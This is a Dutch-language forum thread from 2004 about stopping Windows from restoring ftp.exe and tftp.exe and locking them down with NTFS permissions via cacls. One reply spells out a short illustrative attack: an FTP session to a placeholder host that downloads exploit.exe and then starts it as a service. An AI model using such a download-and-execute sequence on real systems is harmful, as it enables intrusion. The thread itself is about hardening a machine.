om mijn eigen pc te beveiligen wil ik ftp.exe en tftp.exe weg gaan gooien, alleen als ik ze wil verwijderen uit mijn system32 mapje, komen ze naar enkele seconden terug... hoe kan ik dit voorkomen?
Deze bestanden worden beschermd als systeembestand zijnde - met 'sfc' op de commandline kan je hierin het een en ander tunen
En wat hebben ftp en tftp met je beveiliging te maken? 'ftp' is gewoon een CLI ftp client...
sfc....
System File Checker
System File Checker
A wise man's life is based around fuck you
kan je niet beter op NTFS niveau alle rechten verwijderen?
DiedX supports the Roland™, Sound Blaster™ and Ad Lib™ sound cards
Uhhuh. Alleen maken exploits nogal eens gebruik van FTP om van buiten een trojan naar binnen te hengelen.G33rt schreef op 28 april 2004 @ 19:40:
En wat hebben ftp en tftp met je beveiliging te maken? 'ftp' is gewoon een CLI ftp client...
DiedX supports the Roland™, Sound Blaster™ and Ad Lib™ sound cards
lol ga eerst maar eens wat leren over win2k system securityG33rt schreef op 28 april 2004 @ 19:40:
En wat hebben ftp en tftp met je beveiliging te maken? 'ftp' is gewoon een CLI ftp client...
Wellicht kun je me verlichten? Ik zie niet in wat een ftp client op je commandline voor schade kan aanrichten namelijk
van buiten exploits naar binnen hengelen?
Microsoft heeft er eens een mooie paper over geschreven. Windows 2000 ging het toen over.
Microsoft heeft er eens een mooie paper over geschreven. Windows 2000 ging het toen over.
DiedX supports the Roland™, Sound Blaster™ and Ad Lib™ sound cards
ftpG33rt schreef op 28 april 2004 @ 19:43:
Wellicht kun je me verlichten? Ik zie niet in wat een ftp client op je commandline voor schade kan aanrichten namelijk
open x.x.x.x 21
user hack
me
get exploit.exe
get exploit.ini
quit
start exploit.exe -i
net start exploit
en hoepla je bent gehacked
CodeRed (als ik het goed heb) gebruikte TFTP om zichzelf te transporteren van ge-infecteerde server naar geinfecteerde server door via een 'IIS URL' de TFTP client aan te roepen
in die whitepapers hebben ze het ook niet over het verwijderen maar over het uitschakelen van ftp.exe (middels.... ntfs rechten)Verwijderd schreef op 28 april 2004 @ 19:42:
[...]
lol ga eerst maar eens wat leren over win2k system security
A wise man's life is based around fuck you
nou ja maakt allemaal ook niks uit, hoe fix ik het vanuit me dos command line want ik zit via ftp op me server
edit: hoe zit dat met die rechten?
edit: hoe zit dat met die rechten?
[ Voor 15% gewijzigd door Verwijderd op 28-04-2004 19:49 ]
zou je dan ook het niet veel gevaarlijker iexplore.exe moeten verwijderenVerwijderd schreef op 28 april 2004 @ 19:45:
[...]
ftp
open x.x.x.x 21
user hack
me
get exploit.exe
get exploit.ini
quit
start exploit.exe -i
net start exploit
en hoepla je bent gehacked
en mozilla.exe ook
A wise man's life is based around fuck you
om lekker off-topic te gaan mozilla own3dzwelgje schreef op 28 april 2004 @ 19:49:
[...]
zou je dan ook het niet veel gevaarlijker iexplore.exe moeten verwijderen
en mozilla.exe ook
on-topic: hoe zit dat nou met die rechten?
[ Voor 9% gewijzigd door Verwijderd op 28-04-2004 19:50 ]
cacls
cacls /? helpt je verder (tip: zoek op xcacls)
cacls /? helpt je verder (tip: zoek op xcacls)
DiedX supports the Roland™, Sound Blaster™ and Ad Lib™ sound cards
Pagina: 1